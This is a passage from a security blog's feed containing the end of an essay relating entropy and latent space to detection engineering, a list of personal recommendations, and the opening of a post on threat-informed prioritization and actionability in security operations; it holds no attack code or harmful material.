restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>But future threats are not the only source of disruption to businesses and institutions. <em>Current, unprocessed information in our present horizon is also highly entropic</em>. Not having a proactive stance towards the understanding of the present threat landscape simply means your organization lives in a sea of unknown threats: higher quotas of untamed uncertainty.</p><p>The threat intelligence process reduces informational entropy. <strong>In the process of producing information about potential threats, a threat-intel pipeline reduces the uncertainty about them</strong>. A properly implemented pipeline should have the ability to decode the many features of threats and map those out to your organization's attack surface: capability, danger levels, impact and likelihood, actionability, attach chains, etc.</p><p>In this context, actionability can be considered as a measure of how uncertainty of information with low levels of usability can be metabolized into usable information. <strong>The process of bringing a threat under governance is a process of local entropy reduction by which a potentially disruptive state (threat) is modulated in terms of security controls</strong>. &#128137;</p><h2>Latent Space and Detection Engineering</h2><p>As threat hunters and detection engineers, we care about capturing the "genome" of a threat into a codified form that can be identified by our protective systems. However, a full genome can sometimes be unnecessary and computationally heavy.</p><p>* &#129300; <em>intentional mental note: I could have simply just said that we like to "create detections" instead of the above long sentence... yet again isn't this whole essay a long thing? and why would I write even the shortest sentence to repeat what everybody already knows? Anyway, sorry for the time wasted with this snippet of internal monologue.</em> &#128517;</p><p>Shannon's key insight is that predictable information can be compressed more efficiently. Fewer symbols are required to represent the original message. This is also the ultimate goal of CyberSecOps: to encode threats as efficient information within an organizational system. Information is compressed by encoding it within predictable patterns.</p><p><strong>When engineering an analytic like a detection for a threat, we are effectively describing the threat with less information</strong>. From a huge threat report containing thousands of words about the TTPs of a particular threat actor, we derive detective controls that are machine-readable and translate our knowledge about the threat into a simpler and more interoperable representation.</p><p>In the machine-learning realms, this is what's called <code>latent space</code>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!V6Au!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d44ccfc-8ef3-4f77-ac97-ad9c4021ded7_1600x701.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!V6Au!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d44ccfc-8ef3-4f77-ac97-ad9c4021ded7_1600x701.png 424w, https://substackcdn.com/image/fetch/$s_!V6Au!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d44ccfc-8ef3-4f77-ac97-ad9c4021ded7_1600x701.png 848w, https://substackcdn.com/image/fetch/$s_!V6Au!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d44ccfc-8ef3-4f77-ac97-ad9c4021ded7_1600x701.png 1272w, https://substackcdn.com/image/fetch/$s_!V6Au!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d44ccfc-8ef3-4f77-ac97-ad9c4021ded7_1600x701.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!V6Au!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d44ccfc-8ef3-4f77-ac97-ad9c4021ded7_1600x701.png" width="1456" height="638" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1d44ccfc-8ef3-4f77-ac97-ad9c4021ded7_1600x701.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:638,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="https://substackcdn.com/image/fetch/$s_!V6Au!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d44ccfc-8ef3-4f77-ac97-ad9c4021ded7_1600x701.png 424w, https://substackcdn.com/image/fetch/$s_!V6Au!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d44ccfc-8ef3-4f77-ac97-ad9c4021ded7_1600x701.png 848w, https://substackcdn.com/image/fetch/$s_!V6Au!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d44ccfc-8ef3-4f77-ac97-ad9c4021ded7_1600x701.png 1272w, https://substackcdn.com/image/fetch/$s_!V6Au!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1d44ccfc-8ef3-4f77-ac97-ad9c4021ded7_1600x701.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>(Image from <a href="https://hackernoon.com/latent-space-visualization-deep-learning-bits-2-bd09a46920df">Hackernoon</a>)</p><p>I am not a machine learning <em>virtuoso</em> -well not even a proficient one really-, but I think latent space is an apt model to describe what are are trying to achieve when developing detections.</p><p>Latent space is a lower-dimensional representation of information that captures essential features of the input data. Jared Atkinson has implicitly elaborated on this idea through his series <a href="https://posts.specterops.io/on-detection-tactical-to-functional-d71da6505720">On Detection: Tactical to Functional</a>. <em>If you have not been following that series</em>: <strong>you should</strong>. Trust me, the two research streams that have contributed groundbreaking ideas to the world of detection engineering and hunting are the <a href="https://github.com/SigmaHQ/sigma">SIGMA</a> project and Jared's On Detection series. In <a href="https://posts.specterops.io/on-detection-tactical-to-function-810c14798f63">Part 6: What is a Procedure?</a>, Jared very well summarizes the essence of the series in that he has expanded our understanding of the map we use to navigate the <em>territoire</em>:</p><blockquote><p>Imagine that we have been trained our entire career to view the cyber world through a three-layered lens (Tactics, Techniques, and Procedures). As a result, we apprehend the cyber world as something composed of three layers and tend to be limited to thinking and talking (but I repeat myself) about it within this three-layer construct. Through this blog series, I have attempted to shed this preconceived structure to explore the ontological structure of this world, or at least estimate it as well as I can. The result has been interesting for me, and I hope for you as well because we have discovered the existence of at least six layers (functions, operations, procedures, sub-techniques, techniques, and tactics)</p></blockquote><p>Latent space is about the map that a machine learning model "learns" in order to navigate the higher dimensionality of the original information space. Engineering detections is in a way a similar process, by which we try to abstract the complexities of an attack chain and focus on the most important aspects of it. These abstractions happen at various levels, like the six levels from SpecterOps &#128269;. This is what the MITRE Project tries to capture as a knowledge graph. Detection logic or "detectors" are always a lower dimensionality representation of the rich complexity of a threat &#128202;.</p><p>In this sense, detection engineering is the process of understanding the layers that compose a behaviour and the descriptive parameters that best apply to each layer. Engineering detections is also about finding those patterns that constitute the lowest common denominators leading to "choke points" and minimizing the information needed to capture the highest amount of threats of the same class (same procedure or same operation for example)</p><p>Delving deeper into this topic would require a whole other article which is not intended for this series. In our next article, we will explore how can we engineer a threat information processing pipeline based on the core aspects of how information becomes actionable: network dynamics and the discovery chain.</p><h1>Digestif</h1><p>Hey guys, if you stuck with me all the way through to this point: <strong>I salute your potent attention and focus skills!</strong> In today's short-content-rules world, it is hard to find fearless warriors who can read past a twitter-length post.</p><p>To thank you for your incredible determination in our quest for active defence and beyond, allow me to share with you some inspiring things that have happened over the last three weeks:</p><h2><strong>Wim Hof. Inspiring Change</strong>.</h2><p>I woke up one day with a terrible stiff neck, I couldn't work. All I could do was sit in weird positions and watch documentaries. I was blessed enough by the algorithm gods to get a recommendation for The Mulligan Brother's Short Doco <a href="https://youtu.be/9GUPq7XGeLI?si=U5YdQXWXA-gkWF6d">Big Pharma VS Wim Hof | Mulligan Brothers</a>. It's 30 minutes packed with incredible insights and a window into Wim Hof's deep pain that helped him transform himself and so many others on this planet by learning the art of the cold.</p><h2><strong>What the hell does that scatterplot mean?</strong></h2><p>I love data visualization but I always struggle to understand what's the best way to represent the data at hand. For some reason, the filtering alleyways of the internet lead me to <a href="https://www.data-to-viz.com/">data-to-viz.com</a> where I can browse different visualization models and understand their caveats and where they shine!</p><h2><strong>Advancing the state of the art in Detection Engineering</strong></h2><p>There are two ripples in the <code>detectivesphere</code> that <strong>truly advance the state of the art</strong> in the detection engineering space, one is relatively old -by today's cyber standards where yesterday was already a century ago- so its voice has been maturing for the last few years. I am talking of course about the SIGMA project with all the latest from <a href="https://nasbench.medium.com/">Nasreddine Bencherchali</a> like the new <a href="https://blog.sigmahq.io/introducing-the-new-sigma-website-6c111b6ed10f">SIGMA Website</a>.<br>The other hugely transformational insight into the <code>detectivesphere</code> is <a href="https://twitter.com/jaredcatkinson">Jared Atkinson's</a> Series of "<a href="https://posts.specterops.io/on-detection/home">On Detection: Tactical to Functional</a>". I have been following the series since its inception and recently read <a href="https://posts.specterops.io/on-detection-tactical-to-functional-a3a0a5c4d566">Part 11</a>. I love the clarity of the concepts exposed and how this series keeps on building from one idea to the next, in a movement that is creating dynamic new ways of understanding the art of detection engineering. There is deep knowledge in the realization that the classical layers of attacker behaviour (tactic, technique, procedure) can be further broken down into more atomic and less stable states. Quantum leaps.</p><h2><strong>Someone is noticing ThreatHunterz</strong></h2><p>Zach "Techy" Allen <a href="https://www.detectionengineering.net/p/det-eng-weekly-47-my-gpt-is-hallucinating">DetectionEngineeringWeekly 47</a> mentions our <a href="https://quasarops.com/the-problem-of-why-threat-informed-prioritization-in-security-operations-part-1/">previous post</a>. We would like to thank Zach for the brave mention, I highly recommend subscribing to his newsletter for <em>the latest news and how-tos in detection engineering!</em></p><h2><strong>How to do great work</strong></h2><p>I found a gem of the indie bloggosphere: <a href="http://paulgraham.com/greatwork.html">How to do Great Work</a> by Paul Graham. This guy seems to have collected and analysed the patterns that people who do great work in any field develop. I am not talking about the vacuous coach-style self-growth-guru-like article, this is nothing like that, I am talking about a unique literary piece with an exquisite mix of an engineering approach, fresh thought and easy-flowing style.</p><h1>References</h1><ul><li><p><a href="https://www.programiz.com/dsa/huffman-coding">https://www.programiz.com/dsa/huffman-coding</a></p></li><li><p><a href="https://www.inovex.de/de/blog/the-mystery-of-entropy-how-to-measure-unpredictability-in-machine-learning/">https://www.inovex.de/de/blog/the-mystery-of-entropy-how-to-measure-unpredictability-in-machine-learning/</a></p></li><li><p><a href="https://www.inovex.de/de/blog/machine-learning-interpretability/">https://www.inovex.de/de/blog/machine-learning-interpretability/</a></p></li><li><p><a href="https://www.researchgate.net/publication/261042470_Simulation_Results_of_Shannon_Entropy_based_Flexgrid_Routing_and_Spectrum_Assignment_on_a_Real_Network_Topology">https://www.researchgate.net/publication/261042470_Simulation_Results_of_Shannon_Entropy_based_Flexgrid_Routing_and_Spectrum_Assignment_on_a_Real_Network_Topology</a></p></li><li><p><a href="https://towardsdatascience.com/understanding-entropy-the-golden-measurement-of-machine-learning-4ea97c663dc3">https://towardsdatascience.com/understanding-entropy-the-golden-measurement-of-machine-learning-4ea97c663dc3</a></p></li><li><p><a href="https://medium.com/udacity/shannon-entropy-information-gain-and-picking-balls-from-buckets-5810d35d54b4">https://medium.com/udacity/shannon-entropy-information-gain-and-picking-balls-from-buckets-5810d35d54b4</a></p></li><li><p><a href="https://towardsdatascience.com/understanding-latent-space-in-machine-learning-de5a7c687d8d">https://towardsdatascience.com/understanding-latent-space-in-machine-learning-de5a7c687d8d</a></p></li><li><p><a href="https://evolution-outreach.biomedcentral.com/articles/10.1007/s12052-009-0195-3#article-info">https://evolution-outreach.biomedcentral.com/articles/10.1007/s12052-009-0195-3#article-info</a></p></li><li><p><a href="https://citeseerx.ist.psu.edu/document?repid=rep1&amp;type=pdf&amp;doi=a4a6929fbcd9494bf9e02ac81b23fe8b26cc8874">https://citeseerx.ist.psu.edu/document?repid=rep1&amp;type=pdf&amp;doi=a4a6929fbcd9494bf9e02ac81b23fe8b26cc8874</a></p></li><li><p><a href="https://github.com/daveshap/latent_space_activation">https://github.com/daveshap/latent_space_activation</a></p></li></ul>]]></content:encoded></item><item><title><![CDATA[The Problem of Why: Threat-Informed Prioritization in Security Operations.]]></title><description><![CDATA[What does it mean to be threat-informed when it comes to Cyber Defence?]]></description><link>https://www.quasarops.com/p/the-problem-of-why-threat-informed-prioritization-in-security-operations-part-1</link><guid isPermaLink="false">https://www.quasarops.com/p/the-problem-of-why-threat-informed-prioritization-in-security-operations-part-1</guid><dc:creator><![CDATA[Diego Perez]]></dc:creator><pubDate>Fri, 10 Nov 2023 07:52:11 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/f95cc05e-792c-4706-ac9b-4b52884291d6_1024x1024.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!iek-!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6b03565-742c-4624-a823-de1d3aa7ee30_1024x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!iek-!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6b03565-742c-4624-a823-de1d3aa7ee30_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!iek-!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6b03565-742c-4624-a823-de1d3aa7ee30_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!iek-!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6b03565-742c-4624-a823-de1d3aa7ee30_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!iek-!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6b03565-742c-4624-a823-de1d3aa7ee30_1024x1024.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!iek-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6b03565-742c-4624-a823-de1d3aa7ee30_1024x1024.png" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e6b03565-742c-4624-a823-de1d3aa7ee30_1024x1024.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;The Problem of Why: Threat-Informed Prioritization in Security Operations. Part 1.&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="The Problem of Why: Threat-Informed Prioritization in Security Operations. Part 1." title="The Problem of Why: Threat-Informed Prioritization in Security Operations. Part 1." srcset="https://substackcdn.com/image/fetch/$s_!iek-!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6b03565-742c-4624-a823-de1d3aa7ee30_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!iek-!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6b03565-742c-4624-a823-de1d3aa7ee30_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!iek-!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6b03565-742c-4624-a823-de1d3aa7ee30_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!iek-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe6b03565-742c-4624-a823-de1d3aa7ee30_1024x1024.png 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><p>What does it mean to be <em>threat-informed</em> when it comes to Cyber Defence?</p><p>It is one of those classic tough questions that don't have simple answers (at least not ones that are immediately obvious). The great Anton Chuvakin circled back to this topic recently. In this <a href="https://medium.com/mitre-engenuity/threat-informed-defense-is-hard-so-we-are-still-not-doing-it-31ae7b68955f?ref=quasarops.com">article</a>, he asks an excellent question that goes to the heart of the problem:</p><blockquote><p>"...why does everybody seem to support threat-centric security conceptually, but few practice it operationally?"</p></blockquote><p>Operationalizing a threat-centric approach is not a simple undertaking. You must choose between strategic stances for threat intelligence data collection, information assessment, filtering, enrichment and triage.</p><p>You may be tempted to assume that the problem of threat-informed or threat-driven cybersecurity is a threat intelligence one, however, at its core, it is a problem of <strong>information significance</strong>: the dimensions of data provenance, relevance, interoperability, reliability, actionability and timeliness. <em>What does a particular data cluster mean within the context of your organization and how does it inform actionable outcomes?</em></p><p>Ultimately, <strong>what we want is for information to be actionable</strong>, our threat intelligence pipeline should help improve the actionability gradients of threat-related data that our environment emits, so it can drive security control deployments like detections, mitigations, hardening, etc.</p><p>However, the reality we face in most organizations is far from a <em>meaningful information processing pipeline</em>. Most CyberSecOps models out there resemble <a href="https://en.wikipedia.org/wiki/Rube_Goldberg_machine?ref=quasarops.com">Rube Goldberg Machines</a> instead of meaningfully articulated data networks. It suffices to ask some of these questions to your hunting, response, SOC, detection engineering or threat intelligence teams to surface the struggles in providing insight as to what constitutes meaningful threat-driven decisions:</p><ul><li><p>What helps drive the priority of your threat detection, hunting and intelligence collection endeavours?</p></li><li><p>What is your understanding of the purpose of collecting and processing information about threats that may impact your environment?</p></li><li><p>Why have you chosen risk "A" over risk "B" to be prioritized for action?</p></li><li><p>How do you determine the relevancy of a threat to your organization?</p></li><li><p>Do you simply leverage unidimensional criteria like <em>playing MITRE ATT&amp;CK bingo</em> to decide where to best allocate your hunting and detection efforts?</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!KHqQ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcfdfc4d1-939e-4a99-a1f5-330f0173742e_624x624.webp" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!KHqQ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcfdfc4d1-939e-4a99-a1f5-330f0173742e_624x624.webp 424w, https://substackcdn.com/image/fetch/$s_!KHqQ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcfdfc4d1-939e-4a99-a1f5-330f0173742e_624x624.webp 848w, https://substackcdn.com/image/fetch/$s_!KHqQ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcfdfc4d1-939e-4a99-a1f5-330f0173742e_624x624.webp 1272w, https://substackcdn.com/image/fetch/$s_!KHqQ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcfdfc4d1-939e-4a99-a1f5-330f0173742e_624x624.webp 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!KHqQ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcfdfc4d1-939e-4a99-a1f5-330f0173742e_624x624.webp" width="624" height="624" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/cfdfc4d1-939e-4a99-a1f5-330f0173742e_624x624.webp&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:624,&quot;width&quot;:624,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="https://substackcdn.com/image/fetch/$s_!KHqQ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcfdfc4d1-939e-4a99-a1f5-330f0173742e_624x624.webp 424w, https://substackcdn.com/image/fetch/$s_!KHqQ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcfdfc4d1-939e-4a99-a1f5-330f0173742e_624x624.webp 848w, https://substackcdn.com/image/fetch/$s_!KHqQ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcfdfc4d1-939e-4a99-a1f5-330f0173742e_624x624.webp 1272w, https://substackcdn.com/image/fetch/$s_!KHqQ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcfdfc4d1-939e-4a99-a1f5-330f0173742e_624x624.webp 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>When it comes to building a strategic approach for the allocation of resources to threat hunting and detection engineering efforts, there is no single "formula" that can define what is the optimal prioritization model. This, however, <em><strong>does not mean you are spared the need to quest</strong> (and question) around <strong>what constitutes meaningful progress</strong> for your organization</em>. The perils of not doing so are falling into <a href="https://www.foxwizard.com/quest-strategy/">The Inevitable Kraken of Doom</a>, as Dr. Jason Fox puts it:</p><blockquote><p><em>... we collectively maintain a rich delusion of progress, busily working away, like automaton-golems, towards that what I call &#8216;The Inevitable Kraken of Doom&#8217;&#8212;an Eldritch beast that feeds upon the sweet nectar of our impending irrelevance.</em></p></blockquote><p>Despite all challenges in navigating the complexities of threat-driven CyberOps, we seem to succeed in what I can only describe as <strong>perfomant ambiguity</strong>, an ability to operate coherently in situations where there is a high degree of uncertainty and complexity. Why is this? What do we intuitively know about threat-driven strategies that we haven't yet elevated to formal models?</p><p>In this article we will explore this topic and hopefully bring insight into the problem space.</p><h1>Threat Actionability in CyberOps</h1><p>There is a bigger question at play here which will send us on an interesting <strong>quest</strong> (<em>have you now noticed how "quest" and "question" are related?</em>). And that question is: <em>what even is actionability?</em></p><p>Furthermore, wouldn't it be a derived score? If so, how do we arrive at threat actionability scores?</p><p>MITRE defines <a href="https://top-attack-techniques.mitre-engenuity.org/methodology#actionability">actionability</a> in its "Top ATT&amp;CK Techniques" Project as:</p><blockquote><p>The opportunity for a defender to detect or mitigate against each ATT&amp;CK technique based on publicly available analytics and security controls.</p></blockquote><p>The source of the data required to score detection availability is obtained from publicly available detection repositories (<a href="https://car.mitre.org/">MITRE&#8217;s Cyber Analytic Repository</a>, <a href="https://github.com/elastic/detection-rules">Elastic</a>, <a href="https://github.com/SigmaHQ/sigma">Sigma HQ's rules</a>, and <a href="https://research.splunk.com/detections/">Splunk Detections</a>) whilst mitigation availability is sourced from <a href="https://www.cisecurity.org/controls">CIS Critical Security Controls</a> and <a href="https://csrc.nist.gov/publications/detail/sp/800-53/rev-5/final">NIST 800-53 Security Controls.</a>.</p><p>MITRE's definition for the "Top ATT&amp;CK Techniques" project is not lacking in regards to their use case (scoring the top 10 techniques based on <em>actionability, choke-point and prevalence</em>), but when applied to a specific organization, it becomes tricky to translate this to the operational reality of detection and mitigation capabilities.</p><p>For instance, you may be a small or medium business that has low maturity in the "Network Monitoring and Defense" control which means you may not have an EDR or have one that does not provide the level of granularity required to build effective detections for a big range of TTPs. This may result in your organization having low actionability scores for process injection techniques, despite a high availability of such analytics in the public realm.</p><p>In large and mature organizations, the problem is of magnitude and complexity. You may have excellent maturity in all your security controls, but the organization is so dynamic, complex and ever-changing, that it is not possible to have a complete understanding of the full functionality and reach of all the security controls that make up your defence-in-depth layers.</p><p>This is why the "Top ATT&amp;CK Techniques" project provides a calculator to derive the 10 most relevant techniques to hunt, detect and mitigate against based on the particularities of your environment.</p><p>Despite this, the definition of actionability that we will use for this article series is a bit more nuanced. We will define it as:</p><blockquote><p>The degree to which threat information enables the articulation of organizational resources to allow for the efficient mitigation, detection and response of cyber threats.</p></blockquote><p>When you ask how actionable your threat intelligence is, you are asking about the ability of an organization to articulate decision-making processes based on available information to direct the actions required for mitigating risk exposure 